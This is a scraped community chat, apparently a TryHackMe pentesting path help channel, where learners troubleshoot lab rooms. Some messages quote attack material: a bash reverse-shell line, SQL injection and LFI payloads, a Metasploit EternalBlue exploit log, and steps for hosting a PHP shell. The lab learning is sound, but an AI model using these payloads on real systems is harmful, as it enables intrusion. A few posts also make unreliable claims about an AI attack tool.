Yeah, I've reported this via the feedback form. Use web.archive or Google any different one. Personally I just used web.archive - https://web.archive.org/web/20251112071014/https://github.com/payloadbox/command-injection-payload-list

GitHub

๐ŸŽฏ Command Injection Payload List. Contribute to payloadbox/command-injection-payload-list development by creating an account on GitHub.

opaque mesa
#

Hi, I'm currently stuck on the LFI/RFI lab. I'm trying to achieve RCE by hosting a PHP shell and providing the HTTP link to the vulnerable parameter. I've tried using python3 -m http.server, but it isn't working. Could someone explain the correct way to make my local file accessible to the target machine? Do I need to use a specific IP or interface?

versed snow
opaque mesa
next lanceBOT
#

Gave +1 Rep to @versed snow (current: #1039 - 6)

versed snow
#

and if it still doesn't work, send us screenshot or text of the error

midnight fox
#

I was stuck in that room for two days, turns out I was using my own machine, when I switched to the attack box it instantly worked

forest pollen
#

Just finished that part. I think there's an issue with the question tbh. I put the right answer just to move on, but theoretically it doesn't seem right

valid plover
#

Hi everyone,
Iโ€™ve completed the TryHackMe Pentester path and Iโ€™d like to know what the next logical step is to keep practicing in a structured way.

Should I focus first on specific rooms/modules (Active Directory, Web exploitation, privilege escalation),

My goal is to practice realistically, reinforce fundamentals, and progressively move toward real-world pentesting scenarios.

Thanks in advance for your guidance ๐Ÿ™‚

valid plover
next lanceBOT
#

Gave +1 Rep to @paper gale (current: #3539 - 1)

paper gale
fervent thunder
#

Hello everyone well this is just something I want to to do actually soo basically I want to have a group of both newbies and experienced people in th world of cybersecurity mainly red teaming and penetration testing so we can all learn together and build ourselves. I know some might have some contradictory opinions but it's just what I think works. Soo anyone interested?.

paper gale
#

Hello ๐Ÿ‘‹

#

Dear Penetration tester how are you..?

#

What's going on

gaunt epoch
jade pagoda
#

any one know about that how to access linux terminal from window?

jade pagoda
#

and also guide me about how to transfer files between window and kali

karmic scarab
fervent thunder
#

also any really experienced dudes wanna join

fervent thunder
#

Yoo sure

jade pagoda
#

yes

dusk nexus
#

Pentest+ resources and timeline?

next lanceBOT
#

Gave +1 Rep to @jagged river (current: #147 - 70)

jaunty verge
fervent thunder
jaunty verge
#

what time zone are you guys in. I'm in Eastern

regal ridge
#

Hola guys I need vps/vpn. Any spare one

jaunty verge
#

you mean an image?

rancid bison
#

linux privilege escalation - task 6

tried nano to get as shown below but not abel to get root

#

any solutions i even tried with my attacker box and as well as , restarted machine many times no luck could someone help on this

#

?

#

used this one

soft yew
#

and did you find the answer to the first question in task 6?

rancid bison
#

it fixed i restarted whole env 3 times

#

something bugged out

#

thanks btw

azure walrus
#

Does TryHackMe bug out very often?

tawdry magnet
#

Hello.
Does this path leave a free certification at the end?

jaunty verge
#

no the certificates are paid

tawdry magnet
#

is there a certification of completion?

jaunty verge
#

i think you get an image that you can use, but I havent' completed it yet so i don't know

simple skiff
#

After finishing the course, I still feel at a loss about how to tackle certain things.

lavish ibex
open jolt
#

Hi everybody,

Today is a good day for me. For once, I was able to get all the flags smoothly (File Inclusion, Task 8, the challenge) without having to dig a lot through the web, and it didn't seem very difficult to me (whereas in challenges there is usually a step where I struggle), so I guess I'm finally getting a bit better (or at least maybe I suck a bit less).

Anyway, my question is: for Flag3, $_REQUEST is mentioned, but I didn't need it, with just the (SPOILER) ||null byte|| I was fine. Am I missing something here? I have the feeling that the room was trying to show me something with $_REQUEST but I don't know what. Any idea? And is it important?

Also, for the RCE in Lab #Playground, it was surprisingly easy, (SPOILER) ||I just took the first random PHP reverse shell from revshells.com|| and it worked just fine. I was just wondering if ||there is some kind of "super shell" that is more stable and that you'd recommend rather than revshells.com's shells?||

lavish ibex
open jolt
lavish ibex
#

Oh and also, the _$REQUESTS was referring to the fact that it was made out of $_POST $_GET and $_COOKIE that's what i understood from it

#

Because i think in one of the tasks the $_GET didn't work and you had to use the $_POST instead as i remember

versed snow
#

it's just further down the jr. pentester path

eager oxide
#

I had an Interview and the task was to find the 5 most critical vulnerabilities on a Domain (e.g google.com). How are the steps to do that for an jr position? Ty ๐Ÿ™‚

lavish ibex
#

you sound like you just came here and think you can hack google in 5 seconds

#

spoiler

#

||you aint hacking google in 5 seconds||

open jolt
next lanceBOT
#

Gave +1 Rep to @versed snow (current: #375 - 23)

glad zenith
#

IM trying the sql injection room
And I try this :

https://website.thm/analytics?referrer=referrer=admin123' UNION SELECT SLEEP(5),2 where username like 'adsin%

but why is this given me ok and a short time ?

maiden junco
#

Is this issue occuring from my side ??

lavish ibex
glad zenith
#

Anyone who can help me with the problem I posted yesterday ??

lavish ibex
#

which task is it?

glad zenith
#

sql injection - task 8

willow sierra
#

anyone with clues on finding flags in
:Viewing The Page Source (walking an application)

placid peak
#
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.26:4444
[*] 10.66.129.103:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.66.129.103:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.66.129.103:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.66.129.103:445 - The target is vulnerable.
[*] 10.66.129.103:445 - Connecting to target for exploitation.
[+] 10.66.129.103:445 - Connection established for exploitation.
[+] 10.66.129.103:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.66.129.103:445 - CORE raw buffer dump (42 bytes)
[*] 10.66.129.103:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.66.129.103:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.66.129.103:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.66.129.103:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.66.129.103:445 - Trying exploit with 12 Groom Allocations.
[*] 10.66.129.103:445 - Sending all but last fragment of exploit packet
[*] 10.66.129.103:445 - Starting non-paged pool grooming
[+] 10.66.129.103:445 - Sending SMBv2 buffers
[+] 10.66.129.103:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.66.129.103:445 - Sending final SMBv2 buffers.
[*] 10.66.129.103:445 - Sending last fragment of exploit packet!
[*] 10.66.129.103:445 - Receiving response from exploit packet
[+] 10.66.129.103:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.66.129.103:445 - Sending egg to corrupted connection.
[*] 10.66.129.103:445 - Triggering free of corrupted buffer.
dir
[-] 10.66.129.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.66.129.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.66.129.103:445 
#

why its failing...

placid peak
#

kali linux or parrot OS?

lavish ibex
#

in a meaning which one is better?

placid peak
#

yeah

lavish ibex
#

I only know kali linux so i can't really say which one is better

placid peak
#

is it good for red teaming?

rancid crescent
#

Can someone tell me why is it that WormGPT is highly not preferred for bug bounty and while black hats use it most of the time a single attack from that thing can shutdown companies so how do companies stop such attacks

rancid crescent
# late merlin What's wormGPT

An ai that can do automated attacks it can learn and adapt so basically the more it attacks no matter if it succeed or not it will learn and improve so basically it's a nuclear bomb ๐Ÿ˜€

lavish ibex
rancid crescent
lavish ibex
#

oo

#

oops

lavish ibex
rancid crescent
lavish ibex
#

i'm just saying that i don't believe ai's can be that good as you say

rancid crescent
lavish ibex
#

People propably don't use ai's to do bug bounty because it learnt from things that already happened and in bug bountry you are meant to find new ones + ai's in my opinion are unreliable

rancid crescent
lavish ibex
late merlin
wheat fox
#

Hey, I am finally on the intermediate-level rooms, and I am proud of myself. However, I do need to do more challenges.

flat rapids
#

Can you give me link to download debian 12 iso please.

wheat fox
#

I am in the File Inclusion room (first intermediate room), and I am having some trouble with trying to figure out the challenge answers even though I have done all the previous questions along with looking at walkthroughs for the room. I just want to be able to do it on my own, so I decided to not just ctrl+c ctrl+v the answers :3

rancid crescent
potent stratus
#

Hi guys !
I pass the eJPT this weekend, which room or challenge i have to focus to ensure a success ?
Thanks !

lavish ibex
lavish ibex
rancid crescent
lavish ibex
#

Congrats you are smarter than 99% of investors these days

shut prairie
#

anyone here good at doing RFI attacks? im confused on the RFI challenge in the jr pentester path

fast ermine
#

Hello everyone, i'm stuck on Challenge 3 of File Inclusion module.
I've tried using cookies,POST,GET with this payload: ../../../../etc/flag3%00 but it just doesn't work, may anyone help?

shut prairie
#

Add the %00 to the url

vital arch
#

Hello

glass hound
#

Iโ€™m looking for someone skilled in reverse engineering Iโ€™m paying good money

gaunt sentinel
#

i just finished authentification bypass room, where i can practice it if anyone know

#

specially logic flaw and cookie tampering

hasty harbor
#

Hi! Iโ€™m looking for three people to join a small CTF team. Iโ€™d prefer if youโ€™re 15 or younger and live in a time zone thatโ€™s at most ยฑ2 hours from Finland (UTC+0, UTC+1, UTC+2 or UTC+3). The goal isnโ€™t to jump into competitions right away โ€” first weโ€™d get to know each other, practice together, and build a good team dynamic. Iโ€™m a beginner and want to improve step by step toward intermediateโ€‘level CTFs. If youโ€™re interested in learning and practicing together, feel free to message me!

full saddle
#

Me

#

Lemme join

copper shuttle
#

Why does this feel like a lure cri

lavish ibex
#

Because it propably is

dire vigil
#

What's the avg time ppl take to complete jr penetration path

prisma raptor
ivory echo
#

Currently working through the Jr. Pen Tester path and had a few questions: 1. When a device on one subnet wants to ping a device, I understand that the device must first send an ARP request in order to populate its ARP table with the MAC address/IP address. What about when the device I want to ping is on a different subnet than my device? I can't use ARP since it doesn't go past routers. Does the router then send a broadcast to the other subnet trying to reach the correct endpoint?

violet brook
# ivory echo Currently working through the Jr. Pen Tester path and had a few questions: 1. Wh...

Very good question ๐Ÿ™‚ . Your device will "wrap" that ICMP packet with destination IP inside into an Ethernet frame that it will send to your default gateway (router). Router will find destination subnet based on that IP from "wrapped" ICMP packet and send request to the default gateway of that subnet. Default gateway of the targeted subnet will then perform ARP request on the targeted subnet and return response to your gateway , which will forward that response back to your device .

ivory echo
#

Why is nmap able to detect what OS a machine is running without a full TCP connection, but not what versions are running on each port?

tardy robin
#

Hi everyone. I am stuck on task 4 of File Inclusion.

prisma raptor
weary flax
# ivory echo Why is nmap able to detect what OS a machine is running without a full TCP conne...

A full TCP connection is established through a three-way handshake: SYN - SYN/ACK - ACK. When using the stealth scan (-sS), Nmap prevents the connection from being fully established by not sending the final ACK (instead, it usually sends an RST).

โ€‹Nmap can still perform OS detection at this stage by analyzing the characteristics of the SYN/ACK response. Different operating systems have unique 'signatures' in their TCP/IP stack implementations, such as specific TTL (Time to Live) and Window Size values.

โ€‹However, service version detection (-sV) works at the application layer. To identify a version, Nmap needs to exchange data with the service (like a banner grab or a specific probe). This interaction requires a full TCP connection to be established first so that application-layer data can be transmitted.

dire vigil
#

Starting jr penetration testing , ready to give 4-5 hrs daily how time will need to complete it

weary flax
versed snow
#

I'm struggling with Windows Privilege Escalation room, task 6. I constantly get disconnected from machine after a while or I have following error when trying to connect through xfreerdp3. Already tried changing VPN region.
[17:40:21:510] [58580:0000e4d6] [ERROR][com.freerdp.core] - [freerdp_tcp_default_connect]: Couldn't get socket ip address

Anyone is having similar issues?
When using Remmina I also get disconnected

#

[17:46:11:316] [61650:0000f0d4] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer [17:46:11:316] [61650:0000f0d4] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [17:46:11:316] [61650:0000f0d4] [INFO][com.freerdp.client.common] - [client_auto_reconnect_ex]: Network disconnect!

#

I guess something either with the machine in the task or AWS issues

#

Yea, same in other task :/ meh

hard kindle
#

There is a bug i think on Nmap basic port scans ( premium room) in task 5 , when i preform ' nmap -sS <Machine_IP> ' im suppose to recive an open port with 4 digits and im not reciving this kind. and im executing the same command as needed.

weary flax
#

Since task 4,5,6 has their own machine

hard kindle
#

Ohh thatโ€™s probably the problemโ€ฆ.

#

Thnx

violet star
#

How would I determine what my Auth Username and password is ?

glad zenith
#

Hello,

IM stuck at the vulnerabilty room

I use 50477 as shell but whatever I do I see this :

root@ip-10-80-95-16:~# python3 50477.py -u http://10.80.181.232
[+]Connecting...
Enter Command $ls
system

Enter Command $

What can I do to come further in this room ?

prisma raptor
glad zenith
#

I only run the exploit found with searchsploit

#

and I tried this :

Enter Command $bash -c 'bash -i >& /dev/tcp/10.80.95.16/4444 0>&1'

But no answer back

prisma raptor
#

I try the bash ones and it if those doesn't work, I try to python ones

glad zenith
#

no bash ones to find

fuel CMS 1.4.1 - Remote Code Execution (1)    | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2)    | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3)    | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection ( | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authent | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Inject | php/webapps/48778.txt
prisma raptor
glad zenith
#

oke, then I have to think how I can use other reverse shells for that

glad zenith
#

I will

prisma raptor
glad zenith
#

Thanks

oblique moss
oblique moss
# oblique moss

I did over look... "start attack" opens a new intruder attack window in background, working within a tight screen environment - found it! Disregard product warning when initiating attack, as it appears to be for information only.

finite citrus
glad zenith
#

I did solve it but with the exploit given as a way you could not solve it

quaint osprey
#

Hey everyone, Iโ€™m working on a Level 3 SQLi lab and Iโ€™ve hit a wall with a server-side filter.
The Setup: I've bypassed the front-end JS and I'm using 'Edit and Resubmit' in the Network tab to hit the id parameter directly. The server returns 'Dangerous Command' for almost everything. Iโ€™ve tried:
Standard UNION SELECT (with case folding/comments)
Boolean logic like 1' AND 1=1--
URL/Hex encoding the keywords.
I also noticed a csrftoken and dual sessionid cookies (one for / and one for /level3).

is this a Blind SQLi case where I need to bypass space/keyword filtering using alternative whitespace characters, or should I be looking at a different Vector (like the Cookies or CSRF token) because the id param is a honey-pot? Not looking for the flag, just a nudge on the filter logic!"

echo vapor
#

Hi guys,
I'm stuck on windows privilege escalation room- task 6. I'm not able to start a smbserver with impacket with the same commands from the task:
Any help would be appreciated:)

#

It says OSError: Errno 98 Address already in use

prisma raptor
echo vapor
#

Attackbox

#

Attackbox doesn't have impacket installed, i had to install manually.

blazing surge
#

Hello,
im stuck at Upload Vulnerabilities room, the intro of the room tells us to edit /etc/hosts file since the room is using virtual hosting. I followed the steps exactly still for some reason i cant access the website for the practical of the room.
If anyone else has already encountered this or has a solution pls DM or reply.

distant plinth
#

what should i do after finishing jr pentester path? do i start solving challenges so i can hone my skills? if so what challenges should i start solving?

prisma raptor
distant plinth
prisma raptor
distant plinth
#

okay thank you

tardy robin
#

Hello guys. Please i am having trouble with this room:Intro to SSRF. I have done the task, i am unable to gget the flag.

distant plinth
tardy robin
next lanceBOT
#

Gave +1 Rep to @distant plinth (current: #3698 - 1)

tardy robin
distant plinth
#

i believe you can type the room name followed by tryhackme on youtube and you'll find videos about ppl doing the room so that can help you

distant plinth
# tardy robin appreciate.

glad i was able to help also make sure not to include machine ip addresses in screenshots i think it's safer that way

leaden rain
#

Gm guys

barren matrix
#

are you on jr pentester path or veteran youre in cyberscurity ?

leaden rain
leaden rain
#

@barren matrix send me a friend request

barren matrix
leaden rain
leaden rain
barren matrix
leaden rain
barren matrix
#

osint

#

pwn rev or wot

leaden rain
barren matrix
#

Example osint , pwn ,rev , malware dev etc

leaden rain
#

WoT, osint
, malware

barren matrix
leaden rain
#

What about you?

barren matrix
#

which distro youre using btw ?

barren matrix
leaden rain
barren matrix
leaden rain
#

Let's partnership me you in your dm

barren matrix
mossy nexus
tired plover
hazy pasture
#

guys i am confused when im trying to gain root access after finding the setImpersonator is enabled

opaque mesa
#

Hi guys, I'm currently doing the "Vulnerabilities 101" room. In task number 4, they ask: "Using NVD, how many CVEs were published in July 2021?" I've searched and found that the answer is 1,585, but THM says that's incorrect. Why?

prisma raptor
balmy jungle
#

Gm guys

next lanceBOT
#

Gave +1 Rep to @prisma raptor (current: #11 - 937)

hybrid quest
#

For pen testing lab should i set up kali on my main pc in a vm or on vm on proxmox server?

prisma raptor
next lanceBOT
#

Gave +1 Rep to @prisma raptor (current: #11 - 941)

late island
#

Hey everyone , can you help me in RCE task ? How we can execute the attack please

prisma raptor
late island
stiff oxide
late island
stiff oxide
#
  1. start http server locally with python -m http.server $PORT (different from port in step 1.)
#
  1. start nc listener for the reverse shell, and try to access your shell from the site
somber socket
#

Hi, does anyone have a summary of the commands, organized by topic, for the entire learning path? I finished it but didn't take notes.

next lanceBOT
#

Gave +1 Rep to @stiff oxide (current: #1834 - 3)

plush marsh
#

Hey everyone, Iโ€™m new here ๐Ÿ‘‹
I just started the junior pentester path ,
Any advice on what I should focus on first?

mint pilot
#

what's industry best practice? I run a Mac, should my pen testing be done directly on my machine or should I run something like Kali in VM?

slate panther
#

I am learning networking & WiFi security, can someone guide beginner resources?

stiff oxide
bleak quarry
#

I deleted my post, because I just realized that I didn't go through enough.. I found the real flags coolguy

somber socket
#

Hi, does anyone have a summary of the commands, organized by topic, for the entire learning path? I finished it but didn't take notes.
Notion, Obsidian, google docs, word, txt, etc

meager spruce
#

HI

empty belfry
#

anyone facing issues - were the machine ip address doesnt appear even after starting the attackbox in excercises ?

#

Also, as there are lot of tools being discussed, are we expected to remeber all of them for the certification examination ?

empty belfry
hybrid quest
#

Seems good

#

You dont care if something is broken

empty belfry
#

i will be doing this tomorrow and can update how did i go with it

mint pilot
empty belfry
#

anyone doing any projects to put on github while doing this course. ? any ideas ?

barren matrix
#

and smooth

empty belfry
next lanceBOT
#

Gave +1 Rep to @barren matrix (current: #3754 - 1)

barren matrix
whole belfry
fringe bone
#

i was at 57% 5 min ago

#

at least there's new content kekw

abstract dune
#

i'm at 20% now

fringe bone
#

I was feeling bad that I was not doing too many modules this week

#

not anymore

#

The OWASP10 module is still missing A10

abstract dune
#

however, the beginner challenges module looks good

abstract dune
#

in the second room

timber ice
#

I was at 33% complete and I'm now 3% ๐Ÿค”
There seems to be way more content in the pathway now...

visual flint
#

@gentle bridge Hi

fringe bone
#

way more content now

#

i think it was around 30 hours to complete it before

#

now it's 90

lunar steppe
#

The revamp is actually awesome

lunar steppe
echo totem
#

Is the old jr pentest certificate of completion erased then ?

#

For the people that habe already done it before

lost vessel
#

I have been following SEC1 but so confusing. like try many tools for just introduction. and now I jumped to jr.pentest better. anyone relate?

echo totem
fringe bone
#

who can we talk to about it?

lunar steppe
true dove
#

I was at 99% completion on the old track and just got reset to 0% with this new path. Feels bad.

#

Just had to finish up with windows privesc

quartz fractal
#

I think theres a error in the first room Guided Pentest: Web for Task 6 the flag you need to use this following command which does not work

#

If I start the attackbox nothing happens there but if I start the Target Machine both IPs get filled

fringe bone
#

yes that looks wrong

#

the first IP should be the target machine and the second ip the attacker machine

#

Accessing the webshell on the target machine and connecting to the attacker machine

quartz fractal
#

ye

#

thought i go stupid ^^

#

I can post it in bug report but thought as its new room raffle etc someone might wanna check it out right away lol

twilit marlin
#

Is anyone having an issue with the raffle tickets not being awarded after restarting labs that had already been done? Just want to check before logging a bug report if its a known issue

merry night
#

Hey everyone, we have made the Proxy challenge room private for the time being, so we can get it fixed properly. ๐Ÿ™

naive shore
#

Hello in the Penetration Testing Framewokrs room on task 9 the last question is broken or not ??
I think i answer correct and i cannot submit it

#

:/

#

??

elder leaf
naive shore
next lanceBOT
#

Gave +1 Rep to @elder leaf (current: #1504 - 4)

vapid mountain
#

with the rooms that provide tickets but previously I already had them solved how can I get the tickers

shadow echo
quartz fractal
distant plinth
#

i had previously completed jr pentester module but after revamp do i need to re-do it again?

tame vigil
distant plinth
#

thank you

feral hornet
#

~~hey, sorry if this sounds stupid ~~
im on task 6 of guided pentest: web (remote code execution), and im not quite sure how to create the web shell? any help/tips would be appreciated ๐Ÿ‘

#

-# sorry if this is the wrong channel aswell

feral hornet
#

nevermind, seems i have figured it out coolguy

obtuse stone
patent carbon
#

Maybe I'm overlooking something - doing the passive reconnaissance room right now, section 5 "DNS Dumbster" - the question is to lookup tryhackme.com on dnsdumbster and name one additional subdomain next to www and blogthat sounds interesting and has 6 letters. However, the correct answer (||remote||) is not even listed for me on dnsdumbster. What was I doing wrong?

swift folio
#

Hi guys. I'm still quite new to all of this but I'm intrested in red teaming and pen testing as a friend I have inspired me into it.

Ive completed the pre security path and started the path after that while also doing some of the challenges

Thing is, because I have no idea what I'm actually doing, I keep watching walk throighs and following along to them while taking notes rather the completing them myself or at least trying to.

Dose anyone have a few modules they would recommend I jump to so I can start attempting some of these challenges myself so I dont have to copy a walk-through anymore?

grim sleet
#

fuck is this?

#

ofc its not supposed to be english

#

its framework names

#

wdym

timid ingot
#

Answer

grim sleet
#

Why does it have 2 different wrong answer error

#

that doesn't make sense lmfao

timid ingot
grim sleet
#

real lol

patent carbon
swift folio
#

Yea cyber security 101 is the one I'm working throigh now. But while I'm doing that I also try doing some of the easy challenges but with each challenge I'm in the spot where all I can do is run a nmap scan and then promptly find a walk throigh to follow ๐Ÿคฃ๐Ÿคฃ

proud depot
#

Peace be upon those who follow guidance.

dim quiver
#

What will happen with the ticketed rooms I had already completed before the event starting?

steep gate
copper turret
dim quiver
#

Thanks

manic kiln
#

hello i need hit to solve Support room i got the password of login page user: specialadmin@support.thm password:snoopy

#

what next i do

timid ingot
manic kiln
#

I login it is give theme option when I choose colour it change interface colour

coarse pebble
manic kiln
manic kiln
#

This colour are available

radiant bloom
#

has someone a hint for LFI in support room, I try now Intruder with a list of LFI's but no luck so far, IDOR btw I already found and exploited

#

now I got something

#

was nothing arr.

#

RFI url encoded doesnt work

coarse pebble
radiant bloom
#

with curl or burp

manic kiln
#

Hello sir I got flag but not get second one please help me if anyone got

#

Because I have some lag issue in my pc

#

@radiant bloom , @coarse pebble

radiant bloom
#

I not have one flag because my LFI not working, I try bypadd but still not working

#

So someone could enlight me

radiant bloom
#

skin parse the php files green and includes it I guess

#

but only them every try to include others fail or better it happened nothing

coarse pebble
#

do not share flag on discord, delete the message

manic kiln
#

Chat

#

Also you can give me hint so I can find

#

๐Ÿ™

coarse pebble
# manic kiln Chat

when you login as admin, check footer, new select drop down for data and time appear

radiant bloom
#

thx for the hint

radiant bloom
#

found a password but it work not no admin or it loging...wtf

radiant bloom
#

I tried also id_rsa over LFI, passwd, db

#

only config but this password doesn't works

manic kiln
#

I am solve this I am trying 2 hours but not getting when I try hard my pc get freezed

radiant bloom
#

you mean your attack box

glacial yew
#

@coarse pebble hey, if I may ask,

Iโ€™m supposed to find a password inside a variable in a php file and use that to login yes? (Itโ€™s not working)

Thank you for your time

next lanceBOT
#

Gave +1 Rep to @coarse pebble (current: #75 - 150)

manic kiln
#

Sir not understand last part for 2 flag when I tried to send response payload it not giving me response @coarse pebble

glacial yew
manic kiln
#

@coarse pebble finally I complete room support by my self only thank you for video but I use curl method

next lanceBOT
#

Gave +1 Rep to @coarse pebble (current: #75 - 151)

manic kiln
#

I started 7 pm to 2:56 am completely this room now I am at metasploit: scanning and exploitation

eternal widget
#

I just did DNSDumpster task in the Passive Recon Room the answer is not a subdomain listed on the website. Had to completely guess the answer.

quartz fractal
raven laurel
quartz fractal
coarse pebble
empty belfry
#

hey guys - i was 30% done with the course and i opened after a week and the entire course is reset to 0% -. it says - The Jr Pentester Path just got rebuilt. Complete rooms, earn tickets, and win a free PT1 cert.. have they made the course all together new ?

glacial yew
next lanceBOT
#

Gave +1 Rep to @coarse pebble (current: #74 - 152)

glacial yew
oak scaffold
#

any tips for me as i just started the jr pentest path. what do you guys actually do - take notes, repeat, do practice?

twilit marlin
# oak scaffold any tips for me as i just started the jr pentest path. what do you guys actually...

Personally I take notes when I go through the room, use either my own knowledge or my notes to answer the questions, if I canโ€™t use these to answer the questions I go back through and take more notes because I mustโ€™ve missed some key part in the paragraphs. If Iโ€™ve completed a topic like nmap for example Iโ€™ll look at rooms related to that in particular and try complete these using my notes and knowledge then if needed I will research more and add to the notes as I go through the rooms

solemn furnace
#

hey, the flag.txt in the directory enumeration intended ?? (in Guided Pentest: Web)

manic kiln
#

Guys I am doing LLM pentasting anyone compted please givee small Hit to complete i am stuck in Flag

abstract dune
#

Hey everyone!
I'm working on the Time-Based Blind SQLi section of sqli room (task-9 challenge, level 4) and ran into something weird.
When I use a basic SLEEP payload it works fine and delays by 2 seconds:

?referrer=tryhackme.com' UNION SELECT SLEEP(2),1 ;--

But as soon as I add FROM information_schema.columns, it just loads forever (even without the where clause):

?referrer=tryhackme.com' UNION SELECT SLEEP(2),2 FROM information_schema.columns WHERE table_schema LIKE database() ;--

Could someone explain this to me? thanks

abstract dune
#

no, I restarted the machine and it worked ๐Ÿ˜… thanks

next lanceBOT
#

Gave +1 Rep to @glacial yew (current: #2454 - 2)

tardy badger
#

Iโ€™m a penetration tester specializing in authorized offensive security testing. I focus on finding real weaknesses in networks and applications, then giving clear, actionable reports so you can fix them fast.

Iโ€™m thorough, confidential, and only work with explicit permission.

What can I help you with?

radiant bloom
#

The Blue Team Perspective -> splunk box give only a white screen can anybody help me?

manic kiln
#

guys i got error my terget macine is tern off agin and agin after some time

radiant bloom
#

got splunk over browser and could solve the problem

merry night
#

๐Ÿฅณ

paper garnet
#

๐Ÿ‘

sterile trout
#

Anyone able to point out what im missing with the last task of viewing the page source, I have followed the documentation and found the login page with default credentials, however it does not accept the flag

old cargo
orchid flume
#

Aw, I don't want to have to redo rooms for tickets

sterile trout
next lanceBOT
#

Gave +1 Rep to @old cargo

dusky crescent
#

A ticket for premium, if you get 2 more you can redeem it

vagrant charm
#

oh cool, a new path

modest arch
#

I have almost all rooms completed from this path, mytickets! ๐Ÿ˜ฆ

swift star
unborn jewel
#

half the path

granite ore
#

hey, i think one of the flags for "walking an application" isnt working

modest arch
#

oh im actually pepega af, you can reset if you did them already

vagrant charm
granite ore
#

framework flag

#

under viewing the page source

sour basin
vagrant charm
#

ah, there is a flag that will work, I'm assuming you found the one with the credentials?

granite ore
#

yes

vagrant charm
#

There is another

granite ore
#

oh

#

well should have mentioned that

vagrant charm
#

Yeah, I found it a bit odd as well

hollow river
#

Why do I keep getting connection closed by Foreign Host in Jr pentester path, Protocols and Servers, multiple tasks.

past venture
#

Anyone can help me with the Net Sec room last challenge with the IDS?

kindred lantern
past venture
#

Not an issue, just need a bit help with what should I scan specifically to get the flag?

kindred lantern
#

Also anyone got the email for who to contact for some of the prizes

#

Scan the machine a quietly as you can. You can get it with just one flag on ur scan

past venture
#

will it show on the web?

kindred lantern
#

Just remember to reset before every scan. Like right before

#

Yeah the flag shows up on the website

past venture
#

gotcha

#

tnx

vagrant charm
#

Hey, on Authentication Bypass task 3 I have the .txt file and the terminal in the same directory, but it still says it cant find the file. Anyone know why this may be?

wind token
#

this has been a fun path so far ๐Ÿ™‚

ivory lava
#

how long does the hydra for netsec challenge take?

left flicker
#

Working on the directory listing flag, would this be a wget command?

kindred lantern
kindred lantern
ivory lava
#

yeah gave the wrong port

kindred lantern
ivory lava
#

i think all the good stuff is already claimed, me sad

kindred lantern
#

I'd kill for a pineapple

#

Lol

ivory lava
#

meh, all i want is a 3 month voucher

#

or a trowback voucher, stuff to keep me learning for free lol

kindred lantern
#

Iv got oscp voucher

#

Tho feeling the exam would slaughter me

ivory lava
#

damn, you got lucky

#

do you have a term until you have to take it

kindred lantern
#

Not got it yet emailed em tho

ivory lava
#

oh i see

#

you will do fine, just learn

#

and if you want to drop this pass me the voucher keke honkpeace

kindred lantern
#

Haha

modest arch
#

im one away from eJPT / Pineapple / throwback

ivory lava
#

tbh i think everything is claimed already

#

๐Ÿ˜ฆ

modest arch
#

๐Ÿ˜ฆ

acoustic basin
left flicker
#

On the Developer Tools - Network, the flag isnt being accepted... I found ||THM{HEADER_FLAG}||

undone mirage
#

@left flicker
||just figured it out, click through the section headings on the right side of the screen||

next lanceBOT
#

Gave +1 Rep to @undone mirage

ivory lava
#

or im getting really unlucky with just freezes and 3$ swap for 4 rooms in a row

modest arch
#

โ˜•

unborn jewel
kindred lantern
#

any one help me with auth bypass task 3. iv got the wordlists bith in the same directory that im running fuff from and imnot getting any user or passwords being output

#

nodoubt me being a numpty

unborn jewel
#

๐Ÿ˜ฆ

hollow acorn
#

Hey guys, I'm attempting to do the file inclusion challenges and I just cannot figure them out. I feel like I'm super close but just cannot put it together with the pieces I'm missing. Anyone complete it that can give me a hand, please?

upbeat magnet
#

I got the first two, but the 3rd is melting my brain. All i can say is use burpsuite for at least one of them, and no need to write stuff in a terminal/command-line

hollow acorn
#

On the second one, I got to the page where it says "This is a admin page. Now get the flag." But I have no idea what that means or where I go from there to grab the flag

upbeat magnet
#

||now play with the cookie a bit more and see what happens||

#

and gj

hollow acorn
#

There is more I have to do besides changing it from Guest to admin?

upbeat magnet
#

yep.

#

||keep the admin but see what happens if you add to it||

hollow acorn
#

I'm gonna pick it up again tomorrow. Thanks for the hints

upbeat magnet
#

if you ever figure out the third, you're a god

modest arch
#

hello can someone tell is it possible to become a cybersecurity specialist with doing bachelors

tawny flame
#

@ash check the cyber-and-careers channel.

white relic
#

WOAH, thats a lot of powers. better hope I dont find any SSNs

drifting drum
#

Anyone know what I'm doing wrong here?

modest arch
#

im doing it rn

#

if you wanna join a fast call

vagrant hinge
#

what's the difference between this path and the offensive pentesting path?

drifting drum
#

This is ment to be more introductory. Goinging super in depth on all the foundational topics

elfin briar
#

Walking An Application - Task 6: The last flag does not work (from the XHR)